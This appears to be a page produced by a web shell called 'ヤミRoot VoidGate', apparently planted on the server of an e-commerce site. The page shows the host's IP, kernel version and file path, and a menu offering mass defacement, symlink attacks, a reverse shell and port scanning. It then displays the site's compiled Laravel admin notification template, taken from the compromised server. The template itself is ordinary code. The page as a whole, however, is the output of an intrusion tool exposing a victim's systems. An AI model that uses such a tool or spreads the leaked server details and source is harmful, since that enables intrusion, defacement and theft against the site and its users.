ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
storage
/
framework
/
views
/
Viewing: 70b68457868a01251cac6d0c5865b4f5.php
<?php use Illuminate\Support\Str; ?> <?php $__env->startSection('title', translate('add_new_notification')); ?> <?php $__env->startPush('css_or_js'); ?> <meta name="csrf-token" content="<?php echo e(csrf_token()); ?>"> <?php $__env->stopPush(); ?> <?php $__env->startSection('content'); ?> <div class="content container-fluid"> <div class="mb-3"> <h2 class="h1 mb-0 text-capitalize d-flex align-items-center gap-2"> <img width="20" src="<?php echo e(dynamicAsset(path: 'public/assets/back-end/img/push_notification.png')); ?>" alt=""> <?php echo e(translate('send_notification')); ?> </h2> </div> <div class="row gx-2 gx-lg-3"> <div class="col-sm-12 col-lg-12 mb-3 mb-lg-2"> <div class="card"> <div class="card-body"> <form action="<?php echo e(route('admin.notification.index')); ?>" method="post" class="text-start form-advance-validation form-advance-inputs-validation form-advance-file-validation non-ajax-form-validate" novalidate="novalidate" enctype="multipart/form-data"> <?php echo csrf_field(); ?> <div class="row gy-3 mb-4"> <div class="col-md-6"> <div class="h-100"> <div class="form-group"> <label class="form-label" for="exampleFormControlInput1"><?php echo e(translate('title')); ?> </label> <input type="text" name="title" class="form-control" placeholder="<?php echo e(translate('new_notification')); ?>" required> </div> <div class="form-group"> <label class="form-label" for="exampleFormControlInput1"><?php echo e(translate('description')); ?> </label> <textarea name="description" class="form-control text-area-max-min" rows="4" required></textarea> </div> </div> </div> <div class="col-md-6"> <div class="d-flex justify-content-center align-items-center bg-section rounded-8 p-20 w-100 h-100"> <div class="d-flex flex-column gap-30 w-100"> <div class="text-center"> <label for="" class="form-label fw-semibold mb-0"> <?php echo e(translate('image')); ?> <span class="text-info-dark">(<?php echo e(translate('Ratio') . " " . '1:1'); ?>)</span> </label> </div> <div class="upload-file"> <input type="file" name="image" class="upload-file__input single_file_input" data-max-size="<?php echo e(getFileUploadMaxSize()); ?>" accept="<?php echo e(getFileUploadFormats(skip: '.svg,.gif,.webp')); ?>,image/*" value=""> <label class="upload-file__wrapper"> <div class="upload-file-textbox text-center"> <img width="34" height="34" class="svg" src="<?php echo e(dynamicAsset(path: 'public/assets/new/back-end/img/svg/image-upload.svg')); ?>" alt="image upload"> <h6 class="mt-1 fw-medium lh-base text-center"> <span class="text-info"><?php echo e(translate('Click to upload')); ?></span> <br> <?php echo e(translate('or drag and drop')); ?> </h6> </div> <img class="upload-file-img" loading="lazy" src="" data-default-src="" alt=""> </label> <div class="overlay"> <div class="d-flex gap-10 justify-content-center align-items-center h-100"> <button type="button" class="btn btn-outline-info icon-btn view_btn"> <i class="fi fi-sr-eye"></i> </button> <button type="button" class="btn btn-outline-info icon-btn edit_btn"> <i class="fi fi-rr-camera"></i> </button> </div> </div> </div> <p class="fs-12 mb-0 text-center max-w-360 m-auto"><?php echo e(translate('jpg,_jpeg,_png,_gif_image_size_:_max_2_mb')); ?></p> </div> </div> </div> </div> <div class="d-flex justify-content-end flex-wrap gap-3"> <button type="reset" class="btn btn-secondary"><?php echo e(translate('reset')); ?> </button> <button type="<?php echo e(env('APP_MODE')!='demo'?'submit':'button'); ?>" class="btn btn-primary <?php echo e(env('APP_MODE')!='demo'?'':'call-demo-alert'); ?>"><?php echo e(translate('send_Notification')); ?> </button> </div> </form> </div> </div> </div> <div class="col-sm-12 col-lg-12 mb-3 mb-lg-2"> <div class="card"> <div class="card-body d-flex flex-column gap-20"> <div class="d-flex justify-content-between align-items-center gap-20 flex-wrap"> <h3 class="mb-0"> <?php echo e(translate('push_notification_table')); ?> <span class="badge text-dark bg-body-secondary fw-semibold rounded-50"><?php echo e($notifications->total()); ?></span> </h3> <div class="flex-grow-1 max-w-300 min-w-100-mobile"> <form action="<?php echo e(url()->current()); ?>" method="get"> <div class="input-group"> <input id="datatableSearch_" type="search" name="searchValue" class="form-control" placeholder="<?php echo e(translate('search_by_title')); ?>" aria-label="Search orders" value="<?php echo e($searchValue); ?>" required> <div class="input-group-append search-submit"> <button type="submit"> <i class="fi fi-rr-search"></i> </button> </div> </div> </form> </div> </div> <div class="table-responsive"> <table class="table table-hover table-borderless align-middle"> <thead class="text-capitalize"> <tr> <th><?php echo e(translate('SL')); ?> </th> <th><?php echo e(translate('title')); ?> </th> <th><?php echo e(translate('description')); ?> </th> <th><?php echo e(translate('image')); ?> </th> <th><?php echo e(translate('notification_count')); ?> </th> <th><?php echo e(translate('status')); ?> </th> <th><?php echo e(translate('resend')); ?> </th> <th class="text-center"><?php echo e(translate('action')); ?> </th> </tr> </thead> <tbody> <?php $__currentLoopData = $notifications; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key=>$notification): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <tr> <td><?php echo e($notifications->firstItem()+ $key); ?></td> <td> <span class="d-block"> <?php echo e(Str::limit($notification['title'],30)); ?> </span> </td> <td> <?php echo e(Str::limit($notification['description'],40)); ?> </td> <td> <img class="min-w-75" width="75" height="75" src="<?php echo e(getStorageImages(path: $notification->image_full_url, type: 'backend-basic')); ?>" alt=""> </td> <td id="count-<?php echo e($notification->id); ?>"><?php echo e($notification['notification_count']); ?></td> <td> <form action="<?php echo e(route('admin.notification.update-status')); ?>" method="post" id="notification-status<?php echo e($notification['id']); ?>-form" class="no-reload-form"> <?php echo csrf_field(); ?> <input type="hidden" name="id" value="<?php echo e($notification['id']); ?>"> <label class="switcher mx-auto" for="notification-status<?php echo e($notification['id']); ?>"> <input class="switcher_input custom-modal-plugin" type="checkbox" value="1" name="status" id="notification-status<?php echo e($notification['id']); ?>" <?php echo e($notification['status'] == 1 ? 'checked':''); ?> data-modal-type="input-change-form" data-modal-form="#notification-status<?php echo e($notification['id']); ?>-form" data-on-image="<?php echo e(dynamicAsset(path: 'public/assets/new/back-end/img/modal/notification-on.png')); ?>" data-off-image="<?php echo e(dynamicAsset(path: 'public/assets/new/back-end/img/modal/notification-off.png')); ?>" data-on-title = "<?php echo e(translate('Want_to_Turn_ON_Notification_Status').'?'); ?>" data-off-title = "<?php echo e(translate('Want_to_Turn_OFF_Notification_Status').'?'); ?>" data-on-message = "<p><?php echo e(translate('if_enabled_customers_will_receive_notifications_on_their_devices')); ?></p>" data-off-message = "<p><?php echo e(translate('if_disabled_customers_will_not_receive_notifications_on_their_devices')); ?></p>" data-on-button-text="<?php echo e(translate('turn_on')); ?>" data-off-button-text="<?php echo e(translate('turn_off')); ?>"> <span class="switcher_control"></span> </label> </form> </td> <td> <a href="javascript:" class="btn btn-outline-success icon-btn resend-notification" data-id="<?php echo e($notification->id); ?>"> <i class="fi fi-rr-refresh"></i> </a> </td> <td class="text-center"> <div class="d-flex justify-content-center gap-3"> <a class="btn btn-outline-primary icon-btn edit" title="<?php echo e(translate('edit')); ?>" href="<?php echo e(route('admin.notification.update',[$notification['id']])); ?>"> <i class="fi fi-sr-pencil"></i> </a> <a class="btn btn-outline-danger icon-btn delete-data-without-form" title="<?php echo e(translate('delete')); ?>" data-action="<?php echo e(route('admin.notification.delete')); ?>" data-id="<?php echo e($notification['id']); ?>')"> <i class="fi fi-rr-trash"></i> </a> </div> </td> </tr> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </tbody> </table> <table class="mt-4"> <tfoot> <?php echo $notifications->links(); ?> </tfoot> </table> </div> <?php if(count($notifications) <= 0): ?> <?php echo $__env->make('layouts.admin.partials._empty-state',['text'=>'no_data_found'],['image'=>'default'], array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?> <?php endif; ?> </div> </div> </div> </div> </div> <span id="get-resend-notification-route-and-text" data-text="<?php echo e(translate("resend_notification")); ?>" data-action="<?php echo e(route("admin.notification.resend-notification")); ?>"></span> <?php $__env->stopSection(); ?> <?php $__env->startPush('script'); ?> <script src="<?php echo e(dynamicAsset(path: 'public/assets/back-end/js/admin/notification.js')); ?>"></script> <?php $__env->stopPush(); ?> <?php echo $__env->make('layouts.admin.app', array_diff_key(get_defined_vars(), ['__data' => 1, '__path' => 1]))->render(); ?><?php /**PATH /home/pollibazaar/public_html/resources/views/admin-views/notification/index.blade.php ENDPATH**/ ?>
Coded With 💗 by
0x6ick